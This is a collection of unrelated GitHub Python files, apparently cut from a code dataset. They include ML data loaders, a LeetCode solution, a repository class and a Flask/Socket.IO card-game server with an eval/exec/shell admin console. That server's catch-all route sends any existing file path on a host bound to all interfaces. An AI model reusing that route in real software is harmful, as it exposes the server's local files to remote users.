already; make sure\n pull_requests = self.repository.get_pulls(\n base=self.base_branch,\n head=self.target_branch,\n )\n\n if not pull_requests:\n raise\n\n return pull_requests[0]\n\n @classmethod\n def iter_parameters(cls: Type[\"GitHubPlugin\"]) -> Iterable[Parameter]:\n yield Option(\n [\n \"--token\",\n \"--github-token\",\n ],\n envvar=\"GITHUB_TOKEN\",\n help=(\n \"A GitHub API access token, either provided via the GITHUB_TOKEN \"\n \"environment variable or via a CLI prompt.\"\n ),\n hide_input=True,\n prompt=True,\n required=True,\n )\n yield Option(\n [\n \"--organization\",\n \"--org\",\n \"-o\",\n ],\n help=(\n \"The name of the target Github organization name, which may be \"\n \"omitted if the repository name is fully-qualified.\"\n ),\n required=False,\n )\n yield Option(\n [\n \"--repository\",\n \"--repo\",\n \"-r\",\n ],\n help=(\n \"The name of the target Github repository name.\"\n ),\n required=True,\n )\n yield Option(\n [\n \"--branch\",\n \"--branch-name\",\n \"-b\",\n ],\n help=\"The name of the branch to create\",\n required=True,\n )\n yield Option(\n [\n \"--branch-prefix\",\n ],\n help=\"The prefix to apply to the branch\",\n default=\"mend\"\n )\n yield Option(\n [\n \"--base\",\n \"--base-branch\",\n ],\n help=\"The name of the base branch to use; uses the default branch if omitted\",\n )\n yield Option(\n [\n \"--title\",\n ],\n help=\"The pull request title\",\n )\n\n @classmethod\n def from_parameters(\n cls: Type[\"GitHubPlugin\"],\n *args,\n **kwargs,\n ) -> \"GitHubPlugin\":\n github_token = kwargs[\"token\"]\n organization_name = kwargs[\"organization\"]\n repository_name = kwargs[\"repository\"]\n branch_name = kwargs[\"branch\"]\n branch_prefix = kwargs[\"branch_prefix\"]\n base_branch = kwargs[\"base\"]\n title = kwargs[\"title\"]\n\n if organization_name is None:\n if \"/\" not in repository_name:\n raise BadParameter(\n message=\"Expected 'organization/repository' when --organization is omitted.\",\n param_hint=\"repository\",\n )\n else:\n repository_name = f\"{organization_name}/{repository_name}\"\n\n github = Github(github_token)\n repository = github.get_repo(repository_name)\n\n return cls(\n repository=repository,\n base_branch=base_branch or repository.default_branch,\n target_branch=f\"{branch_prefix}/{branch_name}\" if branch_prefix else branch_name,\n title=title or f\"Mend {branch_name}\",\n )\n","repo_name":"jessemyers/mend","sub_path":"mend/plugins/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":8112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73536746432","text":"import torch.utils.data as data\nimport torch\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport os\nimport random\n\nclass TrainDataset(data.Dataset):\n def __init__(self, txt_file, feature_dir, num_utter, num_word, n_batches):\n super().__init__()\n self.feature_dir = feature_dir\n self.num_utter = num_utter\n self.num_word = num_word\n self.n_batches = n_batches\n self.words_dict = {}\n self.batch = []\n\n # structure: self.words_dict = {'word1': [file1, file2, ...], 'word2': [file1, file2, ...], ...}\n with open(txt_file, \"r\") as f:\n self.utterance_list = f.readlines()\n self.utterance_list = list(map(lambda x: x.strip(), self.utterance_list))\n self.utterance_list = list(map(lambda x: tuple(x.split(\",\")), self.utterance_list))\n\n for filename, keyword in self.utterance_list:\n if keyword not in self.words_dict:\n self.words_dict[keyword] = 
[os.path.join(self.feature_dir, keyword, filename + \".npy\")]\n else:\n self.words_dict[keyword].append(os.path.join(self.feature_dir, keyword, filename + \".npy\"))\n\n # structure: self.batch = [[file1, file2, ...], [file1, file2, ...], ...]\n self.create_batch(n_batches)\n\n def create_batch(self, n_batches):\n words_list = list(self.words_dict.keys())\n for i in range(n_batches):\n mini_batch = []\n selected_words = random.sample(words_list, self.num_word) # randomly sample keywords\n for word in selected_words:\n audio_list = self.words_dict[word]\n selected_audio = random.sample(audio_list, self.num_utter) # randomly sample utterances for each keyword\n for audio in selected_audio:\n mini_batch.append(audio)\n self.batch.append(mini_batch)\n\n def __getitem__(self, index):\n mini_batch = self.batch[index] # [file1, file2, ...]\n data_list = []\n for file in mini_batch:\n data = np.load(file)\n data_list.append(data)\n data = np.concatenate(data_list, axis=0) # [-1, 101, 40]\n return data\n\n def __len__(self):\n return self.n_batches\n\nif __name__ == \"__main__\":\n train_set = TrainDataset(\"fine_tune_append.txt\", \"features/train\", 5, 5, 200)\n train_loader = DataLoader(\n dataset=train_set,\n batch_size=1,\n shuffle=True,\n num_workers=1)\n\n for data in train_loader:\n print(data.shape)\n","repo_name":"liuli1996/keyword-spotting-research","sub_path":"demo/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"43222224928","text":"class Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n if sum(cost) > sum(gas): return -1\n i = 0\n tank = 0\n res = 0\n while i < len(gas):\n tank += gas[i] - cost[i]\n if tank < 0:\n tank = 0\n res = i + 1\n i += 1\n return res","repo_name":"thegeorgejoseph/hash-define-dsa","sub_path":"0134-gas-station/0134-gas-station.py","file_name":"0134-gas-station.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3069961444","text":"from scipy.interpolate import UnivariateSpline\nfrom scipy.interpolate import KroghInterpolator\nfrom format_data import Formatter\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nfrom sklearn import svm, linear_model\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import LinearRegression\n#import seaborn as sns; sns.set()\nfrom statsmodels.tsa.stattools import acf, pacf\nfrom sklearn.linear_model import LinearRegression\n\nclass Interpreter:\n def __init__(self, url, file_name, data_file_name, n_days):\n '''\n Initializes the data Interpreter object with\n a data Formatter object and uses that object to grab\n the formatted x and y values. 
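# The if/else insert in TrainDataset.__init__ above is the textbook case for
# collections.defaultdict: same indexing, one branch fewer. A sketch with
# illustrative file/keyword pairs:
from collections import defaultdict
import os

words_dict = defaultdict(list)
for filename, keyword in [("a1", "yes"), ("a2", "yes"), ("b1", "no")]:
    words_dict[keyword].append(os.path.join("features/train", keyword, filename + ".npy"))
# words_dict["yes"] -> ['features/train/yes/a1.npy', 'features/train/yes/a2.npy']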
Initializes the number of\n days to predict into the future and generates\n a list of wanted days.\n\n url: url of data to obtain from Tracktor\n file_name: name of file where id of data is saved\n data_file_name: name of file where data is saved\n NOTE: Only need data_file_name and data_file if those files\n already exist, the url input can be an empty string.\n n_days: number of days user wants the model to extrapolate\n into the future\n '''\n self.formatter = Formatter(url, file_name, data_file_name)\n self.x_values, self.y_values = self.formatter.data_to_matrix()\n self.intra_x_values = []\n self.n_days = n_days\n self.creating_wanted_days()\n self.intra_y_values = []\n\n def creating_wanted_days(self):\n epoch_time = time.time() * 1000\n for day in range(self.n_days):\n self.intra_x_values.append(self.formatter.add_day(epoch_time))\n epoch_time = self.formatter.add_day(epoch_time)\n return self.intra_x_values\n\n def data_to_function(self):\n '''\n Uses the KroghInterpolator to make a function from our\n data and uses that function to predict the prices at\n the wanted dates.\n\n returns: wanted dates (self.intra_x_values)\n and their associated predicted prices (self.intra_y_values)\n '''\n print(self.x_values)\n print(self.y_values)\n poly_func = KroghInterpolator(self.x_values,self.y_values)\n self.creating_wanted_days()\n #self.intra_x_values= [1477492378020,1477492378030]\n #self.intra_x_values = self.intra_x_values[:-1]\n self.intra_x_values = np.asarray(self.intra_x_values)\n #print(self.intra_x_values)\n print(self.intra_x_values)\n self.intra_y_values = poly_func.__call__(self.intra_x_values)\n print(self.intra_y_values)\n return self.intra_x_values, self.intra_y_values\n\n def do_the_svm(self):\n self.func = svm.SVR(kernel='poly')\n self.func.fit(np.array(self.x_values).reshape(-1,1),np.ravel(np.array(self.y_values).reshape(-1,1)))\n print(self.func.predict(np.array(self.intra_x_values).reshape(-1,1)))\n\n def do_linear_regression(self):\n regr = linear_model.LinearRegression()\n train_data_X = map(lambda x: [self.x_values], list(self.x_values))\n train_data_Y = list(self.y_values)\n regr.fit(np.array(self.x_values).reshape(-1,1),np.array(self.y_values).reshape(-1,1))\n print(self.y_values)\n a= np.array(self.intra_x_values).reshape(-1,1)\n print(regr.predict(a))\n\n def make_poly_model(self):\n poly_model = make_pipeline(PolynomialFeatures(3),\n LinearRegression())\n poly_model.fit(np.array(self.x_values).reshape(-1,1),np.array(self.y_values).reshape(-1,1))\n print(poly_model.predict(np.array(self.intra_x_values).reshape(-1,1)))\n\n def graph_intra_val(self):\n #self.data_to_function()\n fig = plt.figure()\n subplot = fig.add_subplot(111)\n p = subplot.plot(self.x_values+self.intra_x_values,self.y_values+self.intra_y_values[0])\n fig.show()\n\n def find_lowest_price(self):\n price = min(self.intra_y_values)\n dic_intra = {key:value for key, value in zip(self.intra_x_values, self.intra_y_values)}\n #returns the day\n\n return [key for key, value in dic_intra.items() if value == price]\n\n\n\ntest_interpreter = Interpreter('', 'camera.txt', 'camera_data.txt',30)\nmyinterpreter = Interpreter('', 'phone.txt', 'phone_data.txt', 30)\n","repo_name":"vickymmcd/AmazonSoftDesWarriors","sub_path":"old_code/krogh_interpreter.py","file_name":"krogh_interpreter.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71914174911","text":"import abc\nfrom typing import Type, Union, List\nimport 
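# A practical caveat for data_to_function() in krogh_interpreter.py above:
# KroghInterpolator fits one global polynomial, and with abscissae that are
# epoch timestamps in milliseconds (~1e12) the powers overflow and the fit
# oscillates wildly. Rescaling x to small units first is the usual remedy;
# a hedged sketch, not part of the class above:
import numpy as np
from scipy.interpolate import KroghInterpolator

MS_PER_DAY = 8.64e7
x_ms = np.array([1.6e12, 1.6e12 + MS_PER_DAY, 1.6e12 + 2 * MS_PER_DAY])  # epoch ms
y = np.array([10.0, 12.0, 11.0])
poly = KroghInterpolator((x_ms - x_ms[0]) / MS_PER_DAY, y)  # fit in days, not ms
query_ms = x_ms[0] + 3 * MS_PER_DAY  # one day past the data
print(poly((query_ms - x_ms[0]) / MS_PER_DAY))  # evaluate in the same scaled units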
sqlalchemy as sql\n\nfrom domains import models\n\n\nclass AbstractRepository(abc.ABC):\n def __init__(self):\n self.cache = {}\n\n def add(\n self,\n model: Type[models.Model],\n *args,\n **kwargs,\n ):\n self._add(model)\n model_type = type(model)\n if model_type not in self.cache:\n self.cache[model_type] = {}\n self.cache[model_type][model.id] = model\n\n def get(\n self,\n model_type: Type[models.Model],\n many: bool = False,\n *args,\n **kwargs,\n ) -> Union[List[Type[models.Model]], Type[models.Model]]:\n result = self._get(*args, **kwargs)\n if result is not None:\n if model_type not in self.cache:\n self.cache[model_type] = {}\n if many:\n for model in result:\n self.cache[model_type][model.id] = model\n else:\n self.cache[model_type][result.id] = result\n return result\n\n @abc.abstractmethod\n def _add(\n self,\n model: Type[models.Model],\n *args,\n **kwargs,\n ):\n raise NotImplementedError\n\n @abc.abstractmethod\n def _get(\n self,\n model_type: Type[models.Model],\n many: bool = False,\n *args,\n **kwargs,\n ) -> Union[List[Type[models.Model]], Type[models.Model]]:\n raise NotImplementedError\n\n\nclass SQLAlchemyRepository(AbstractRepository):\n def __init__(self, session):\n super().__init__()\n self.session = session\n\n def _add(\n self,\n model: Type[models.Model],\n *args,\n **kwargs,\n ):\n self.session.add(model)\n\n def _get(\n self,\n model_type: Type[models.Model],\n many: bool = False,\n *args,\n **kwargs,\n ) -> Union[List[Type[models.Model]], Type[models.Model]]:\n result = self.session.query(model_type).filter_by(**kwargs)\n if many:\n return result.all()\n return result.first()\n","repo_name":"hjjddb/hus-user-service","sub_path":"src/user_service/infrastructures/dependencies/repositories.py","file_name":"repositories.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21936520792","text":"import datetime\nimport time\n\nutc_now = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)\nutc_now_tsp: int = int(utc_now.timestamp())\n\nmonotonic_time = time.monotonic()\n\nif __name__ == '__main__':\n print(\n f\"Monotonic UTC now: {utc_now.isoformat()} or {utc_now_tsp} \"\n f\"({monotonic_time:.3f} seconds on the monotonic clock)\")\n","repo_name":"smartleohu/PythonWithDDD","sub_path":"solutions/utils/datetimes.py","file_name":"datetimes.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"24944833995","text":"import os\nimport random\nimport sys\nimport threading\nimport tkinter as tk\nfrom tkinter import ttk\nimport traceback\nfrom tkinter.scrolledtext import ScrolledText\nfrom webbrowser import open as web_open\nimport eventlet\nimport eventlet.wsgi\n\nimport flask\nimport flask_cors\nimport flask_socketio\nfrom waitress import serve\n\napp = flask.Flask(\"Poker\")\nflask_cors.CORS(app)\nsock = flask_socketio.SocketIO(app)\n\n# RULES:\nclass Rules:\n bypassButterFlies = False\n\nrules = Rules()\n\n\nwin = tk.Tk()\nwin.title(\"Manager\")\nimgicon = tk.PhotoImage(file='ico.png')\nwin.tk.call('wm', 'iconphoto', win._w, imgicon)\nwin.attributes(\"-topmost\",True)\nwin.geometry(\"800x450\")\ns = ScrolledText(win, insertwidth=1,font=(\"Segoe UI\",10))\n# s.config(width=0,height=0)\ns.bind(\"<Key>\", lambda e: \"break\")\ns.pack(expand='yes',fill=\"both\",padx=5,pady=3)\nt=ttk.Entry(win,font=(\"Segoe UI\",10))\nt.pack(fill=\"x\",padx=5,pady=3)\nwin.protocol(\"WM_DELETE_WINDOW\",lambda:os.kill(os.getpid(),2))\nspotIdDict = {}\n\ndef 
log(h,c,d,gt=True):\n o = s.index(tk.INSERT)\n s.insert(\"end\",f\"\\r[{h}] Called {c}: {d}\\n\")\n s.see(\"end\")\n line,char = o.split(\".\")\n s.tag_add(\"brack\",o,f\"{line}.{int(char)+3+len(h)}\")\n s.tag_add(\"fun\",f\"{line}.{int(char)+3+len(h)}\",f\"{line}.{int(char)+3+len(h)+len(c)+9}\")\n s.tag_add(\"args\",f\"{line}.{int(char)+3+len(h)+len(c)+9}\",f\"{line}.{int(char)+3+len(h)+len(c)+10+len(str(d))}\")\n\ndef eventl(_=None):\n def puts(e):\n s.insert(\"end\",str(e)+\"\\n\")\n s.see('end')\n cmd = t.get()\n if cmd.lower() ==\"globals\":\n puts(globals())\n elif cmd.startswith(\">\"):\n try:\n puts(eval(cmd[1:]))\n except SystemExit:\n puts(\"Exit\")\n os.kill(os.getpid(),2)\n except Exception:\n o = s.index(tk.INSERT)\n puts(traceback.format_exc())\n n = s.index(tk.INSERT)\n s.tag_add(\"exc\",o,n)\n elif cmd.startswith(\"!\"):\n try:\n exec(cmd[1:])\n except SystemExit:\n puts(\"Exit\")\n os.kill(os.getpid(), 2)\n except Exception:\n o = s.index(tk.INSERT)\n puts(traceback.format_exc())\n n = s.index(tk.INSERT)\n s.tag_add(\"exc\", o, n)\n elif cmd.startswith(\"$\"):\n puts(os.popen(cmd[1:]+\" 2>&1\").read())\n elif cmd.lower() == \"exit\":\n puts(\"Exit\")\n os.kill(os.getpid(),2)\n elif cmd.lower().startswith(\"attr\"):\n args = cmd.split(\" \")\n if len(args)!=4:\n puts(\"Syntax error, format: attr <obj> <attr> <val>\")\n return\n _,obj,attr,val = args\n try:\n exec(f\"{obj}.{attr} = {val}\")\n puts(f\"Set {obj}.{attr} to {val}\")\n except:\n puts(\"Syntax error\")\n elif cmd.lower().startswith(\"gattr\"):\n args = cmd.split(\" \")\n if len(args) != 3:\n puts(\"Syntax error, format: gattr <obj> <attr>\")\n return\n _, obj, attr = args\n try:\n puts(eval(f\"{obj}.{attr}\"))\n except:\n puts(\"Syntax error\")\n elif cmd.lower().startswith(\"lattr\"):\n args = cmd.split(\" \")\n if len(args) != 2:\n puts(\"Syntax error, format: lattr <obj>\")\n return\n _, obj = args\n try:\n it = globals()\n for i in obj.split(\".\"):\n it = it[i].__dict__\n puts(it)\n except KeyError:\n puts(\"Variable error\")\n except:\n puts(\"Error\")\n elif cmd.lower().startswith(\"rule\"):\n args = cmd.split(\" \")\n if len(args)!=3:\n puts(\"Syntax error, format: rule <rule> <value>\")\n return\n _,obj,attr = args\n if hasattr(rules,obj):\n try:\n setattr(rules,obj,eval(attr))\n puts(f\"Set rules.{obj} to {attr}\")\n except:\n puts(f\"Invalid python: '{attr}'\")\n return\n else:\n puts(\"No attribute named \"+obj)\n elif cmd.lower().startswith(\"aler\"):\n args = cmd.split(\" \")\n with app.app_context():\n sock.emit(\"alert\",{\"msg\":\" \".join(args[1:])},broadcast=True)\n \n elif cmd.lower() == \"open\":\n web_open(\"http://127.0.0.1:80\")\n elif cmd.lower() == \"help\":\n w = tk.Toplevel(win)\n tex = tk.Text(w,insertwidth=1)\n w.title(\"Help\")\n w.attributes(\"-topmost\",True)\n tex.bind(\"<Key>\",lambda i:\"break\")\n tex.pack(expand=\"yes\",fill=\"both\")\n tex.insert(\"0.0\",\"\"\"\\\n Command | Description\n \nglobals View globals\n> expr:Expr Execute expression [expr] and print result\n!
\"\"\")\n    elif cmd.lower() == \"reload\":\n        os.execv(sys.executable, ['python'] + sys.argv)\n    elif cmd.lower() == \"clear\":\n        s.delete(\"1.0\",\"end\")\n    elif cmd.lower() == \"stat\":\n        w = tk.Toplevel(win)\n        tex = tk.Text(w, insertwidth=1)\n        w.title(\"Stat\")\n        w.attributes(\"-topmost\", True)\n        tex.bind(\"<Key>\", lambda i: \"break\")\n        tex.pack(expand=\"yes\", fill=\"both\")\n        for i in [*range(1,6+1)]+[\"Deck\"]:\n            tex.insert(\"end\",\nf\"\"\"\\\nNUMBER: {i}\nNAME: '{cards.gindex(i).name}'\nTOTALPOINTS: {cards.gindex(i).tPts}\nPOINTS: {cards.gindex(i).pts}\nCARDS: {cards.gindex(i).cards}\nSENTCARDS: {cards.gindex(i).sent}\n\"\"\")\n        \n    elif cmd == \"\":\n        pass\n    else:\n        puts(\"Not a command.\")\n    t.delete(\"0\", \"end\")\n\nt.bind(\"<Return>\",eventl)\n\nclass Player:\n    def __init__(self):\n        self.pts = 0\n        self.tPts = 0\n        self.cards = []\n        self.sent = []\n        self.name = \"[EMPTY SPOT]\"\n    def __repr__(self):\n        return(f\"Player({self.__dict__})\")\n\nclass Cards:\n    def __init__(self):\n        self.p1=Player()\n        self.p2=Player()\n        self.p3=Player()\n        self.p4=Player()\n        self.p5=Player()\n        self.p6=Player()\n        self.pDeck = Player()\n    def generate(self):\n        log(\"SCRIPT\",\"Cards.generate\",\"\",gt=False)\n        for i in range(1,6+1):\n            exec(f\"self.p{i}.cards = []\")\n            exec(f\"self.p{i}.sent = []\")\n            exec(f\"self.p{i}.pts = 0\")\n        cards = list(range(1,216+1))\n        random.shuffle(cards)\n\n        self.pDeck.cards = cards[:6]\n        self.pDeck.sent = []\n        self.pDeck.pts = 0\n\n        # deal the remaining 210 cards round-robin: 35 to each of the 6 spots\n        g=0\n        for i in cards[6:]:\n            g+=1\n            exec(f\"self.p{g}.cards.append(i)\")\n            if g==6:\n                g=0\n        log(\"SCRIPT\",\"Cards.generate\",self.__dict__,gt=False)\n        # with app.test_request_context(\"/\"):\n        #     flask_socketio.emit(\"restart\",{self.p1,self.p2,self.p3,self.p4,self.p5,self.p6},broadcast=True,include_self=True,namespace=\"/\")\n    def gindex(self,index) -> Player:\n        return getattr(self,f\"p{index}\")\n\nclass DicePlayerStatus:\n    TAKEN = 1\n    AVAIL = 2\n\nclass DicePlayer:\n    def __init__(self):\n        self.status = DicePlayerStatus.AVAIL\n\nclass DiceRoller():\n    def __init__(self):\n        self.p1 = DicePlayer()\n        self.p2 = DicePlayer()\n        self.p3 = DicePlayer()\n        self.p4 = DicePlayer()\n        self.p5 = DicePlayer()\n        self.p6 = DicePlayer()\n    def gindex(self,index) -> DicePlayer:\n        return getattr(self, f\"p{index}\")\n\ns.tag_config(\"exc\",foreground=\"red\")\ns.tag_config(\"brack\",foreground=\"blue\")\ns.tag_config(\"fun\",foreground=\"green\")\ns.tag_config(\"args\",foreground=\"orange\")\n\ndef exc(f):\n    def e(*args,**kwargs):\n        try:\n            f(*args,**kwargs)\n        except:\n            o = s.index(tk.INSERT)\n            log(\"ERROR\",f.__name__,\"\\n\"+traceback.format_exc())\n            n = s.index(tk.INSERT)\n            s.tag_add(\"exc\",o,n)\n    return e\n\ncards = Cards()\ncards.generate()\n\nspots = DiceRoller()\n\n@sock.on(\"get_player\")\n@exc\ndef get_player(data):\n    log(\"SCRIPT\",\"get_player\",data)\n    flask_socketio.emit(\"recieve_player_data\",{1:spots.p1.status,2:spots.p2.status,3:spots.p3.status,4:spots.p4.status,5:spots.p5.status,6:spots.p6.status})\n\n@sock.on(\"take_spot\")\n@exc\ndef take_spot(data):\n    log(\"SCRIPT\", \"take_spot\", str(data)+f\" 
old:{spots.gindex(data['spot']).status}\")\n    if not rules.bypassButterFlies:\n        spots.gindex(data[\"spot\"]).status = DicePlayerStatus.TAKEN\n        spotIdDict[flask.request.sid] = data['spot']\n        flask_socketio.emit(\"take_spot\",{'spot':data['spot']},broadcast=True)\n    else:\n        log(\"RULES\",\"take_spot\",\"bypassButterFlies is true.\")\n\n@sock.on(\"disconnect\")\n@exc\ndef disconnect():\n    # pop the sid so a client that never took a spot cannot raise a KeyError\n    data = spotIdDict.pop(flask.request.sid, None)\n    if data is None:\n        return\n    log(\"SCRIPT\",\"DISCONNECT\",data)\n    if not rules.bypassButterFlies:\n        spots.gindex(data).status = DicePlayerStatus.AVAIL\n        flask_socketio.emit(\"avail_spot\",{'spot':data},broadcast=True)\n    else:\n        log(\"RULES\",\"avail_spot\",\"bypassButterFlies is true.\")\n\n@sock.on(\"hmsg\")\n@exc\ndef msg(dt):\n    flask_socketio.emit(\n        \"alert\", {'msg': dt[\"text\"]}, broadcast=True, include_self=True)\n\n@sock.on('init_cards')\n@exc\ndef init_cards(data):\n    log(\"SCRIPT\",\"init_cards\",data)\n    cards.gindex(data[\"player\"]).name = data[\"name\"]\n    flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True)\n\n@sock.on(\"mov_cards\")\n@exc\ndef mov_cards(data):\n    log(\"SCRIPT\",\"mov_cards\",data)\n    if data[\"type\"] == \"LTR\": # Cards to sent\n        cards.gindex(data[\"player\"]).cards.remove(data[\"card\"])\n        cards.gindex(data[\"player\"]).sent.append(data[\"card\"])\n    if data[\"type\"] == \"RTL\": # Sent to cards\n        cards.gindex(data[\"player\"]).sent.remove(data[\"card\"])\n        cards.gindex(data[\"player\"]).cards.append(data[\"card\"])\n    flask_socketio.emit(\"mov_cards\",{\"player\":data[\"player\"],\"card\":data[\"card\"],\"type\":data[\"type\"]},broadcast=True,include_self=True)\n\n@sock.on(\"score\")\n@exc\ndef score(data):\n    log(\"SCRIPT\",\"score\",data)\n    cards.gindex(data[\"player\"]).pts+=data[\"pts\"]\n    flask_socketio.emit(\"score\",{\"player\":data[\"player\"],\"pts\":cards.gindex(data[\"player\"]).pts},broadcast=True,include_self=True)\n\n@sock.on(\"totScore\")\n@exc\ndef tscore(data):\n    log(\"SCRIPT\",\"totScore\",data)\n    cards.gindex(data['player']).tPts=data[\"pts\"]\n    flask_socketio.emit(\"totScore\",{\"player\":data[\"player\"],\"pts\":data[\"pts\"]},broadcast=True,include_self=True)\n\n@sock.on(\"name\")\n@exc\ndef name(data):\n    log(\"SCRIPT\",\"name\",data)\n    cards.gindex(data['player']).name = data['name']\n    flask_socketio.emit(\"name\",{\"player\":data[\"player\"],\"name\":data[\"name\"]},broadcast=True,include_self=True)\n\n@sock.on(\"reset\")\n@exc\ndef reset(data=None):\n    log(\"SCRIPT\",\"reset\",data)\n    cards.generate()\n    flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True)\n\n@sock.on(\"set_deck\")\n@exc\ndef setDeck(data):\n    log(\"SCRIPT\",\"set_deck\",data)\n    cards.pDeck.cards = data[\"deck\"]\n    flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True)\n\n@sock.on(\"set_player\")\n@exc\ndef setPlayer(data):\n    log(\"SCRIPT\",\"set_player\",data)\n    cards.gindex(data[\"player\"]).cards = data['cards']\n\n@sock.on(\"movCardD\")\n@exc\ndef movCardD(data):\n    log(\"SCRIPT\",\"movCardD\",data)\n    if data[\"type\"]==\"DTC\": # Deck to card\n        log(\"LOG\",'movCardD: cards: data[\"player\"]',cards.gindex(data['player']).cards)\n        cards.gindex(data['player']).cards.append(data['card'])\n        cards.pDeck.cards.remove(data['card'])\n    if data['type']==\"CTD\": # Card to deck\n        cards.pDeck.cards.append(data['card'])\n        cards.gindex(data['player']).cards.remove(data['card'])\n    flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True) \n\n
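# Editorial note: this full-state \"recieve\" broadcast is repeated by several\n# handlers in this file; a hypothetical helper such as\n#     def broadcast_state():\n#         flask_socketio.emit(\"recieve\", {**{i: cards.gindex(i).__dict__ for i in range(1, 7)}, \"all\": cards.pDeck.__dict__}, broadcast=True, include_self=True)\n# would remove the duplication (kept inline here to preserve the original flow).\n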
data[\"player\"]',cards.gindex(data['player']).cards)\n cards.gindex(data['player']).cards.append(data['card'])\n cards.pDeck.cards.remove(data['card'])\n if data['type']==\"CTD\": # Card to deck\n cards.pDeck.cards.append(data['card'])\n cards.gindex(data['player']).cards.remove(data['card'])\n flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True) \n\n@sock.on(\"message\")\n@exc\ndef lg(dt):\n log(\"SCRIPT\",\"socket\",dt)\n\n@sock.on(\"clearPlr\")\n@exc\ndef clearPlr(p):\n log(\"SCRIPT\",\"clearPlr\",p)\n cards.gindex(p[\"p\"]).sent = []\n flask_socketio.emit(\"recieve\", {1: cards.p1.__dict__, 2: cards.p2.__dict__, 3: cards.p3.__dict__, 4: cards.p4.__dict__,\n 5: cards.p5.__dict__, 6: cards.p6.__dict__, \"all\": cards.pDeck.__dict__}, broadcast=True, include_self=True)\n\n@app.route(\"/\")\ndef path(path):\n if path.startswith(\"images/\"):\n pass # Useless information, do not log\n else:\n log(f\"REQUEST ({flask.request.remote_addr})\",\n path, flask.request.method)\n if os.path.exists(path):\n return flask.send_file(path)\n else:\n flask.abort(404)\n\n@app.route(\"/\")\ndef root():\n log(\"REQUEST\",\"/\",flask.request.method)\n return flask.send_file(\"index.html\")\n\n@app.after_request\ndef add_header(r):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n r.headers['Cache-Control'] = 'public, max-age=0'\n return r\n\ndef init():\n eventlet.monkey_patch()\n sock.run(app,host=\"0.0.0.0\",port=80)\nthreading.Thread(target=init).start()\ntry:\n t.focus_force()\n win.mainloop()\nexcept KeyboardInterrupt:\n print(\"Exit\")\n","repo_name":"maxjiang2021/game","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":14556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"6743898437","text":"import glob, tempfile, os\nimport PIL.Image\nimport numpy as np\nimport torch, torchvision\n\n\nWHITE = (255,255,255)\nGREEN = ( 0,255, 0)\nRED = (255, 0, 0)\nBLUE = ( 0, 0,255)\nBLACK = ( 0, 0, 0)\n\n\nclass Dataset:\n def __init__(self, inputfiles, targetfiles, patchsize=512, augment=False, colors=[WHITE, GREEN], tmpdir='.'):\n self.augment = augment\n self.patchsize = patchsize\n self.colors = colors\n self.inputfiles = inputfiles\n self.targetfiles = targetfiles\n self.cachedir = tempfile.TemporaryDirectory(prefix='delete_me_cache_', dir=tmpdir)\n print(self.cachedir.name)\n self.n_patches = self._load_and_cache_all(inputfiles, targetfiles)\n\n self.transform = torchvision.transforms.Compose([torchvision.transforms.ToTensor()])\n if self.augment:\n self.transform.transforms += [\n torchvision.transforms.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.2, hue=0.02)\n ]\n \n def _load_and_cache_all(self, imagefiles, targetfiles):\n i = 0\n for image_f, target_f in zip(imagefiles, targetfiles):\n image = PIL.Image.open(image_f).convert('RGB') * np.uint8(1)\n target = self.load_target_image(target_f)\n assert image.shape[:2] == target.shape[:2]\n image_patches = slice_into_patches_with_overlap(image, self.patchsize)\n target_patches = slice_into_patches_with_overlap(target[...,np.newaxis], self.patchsize)\n for 
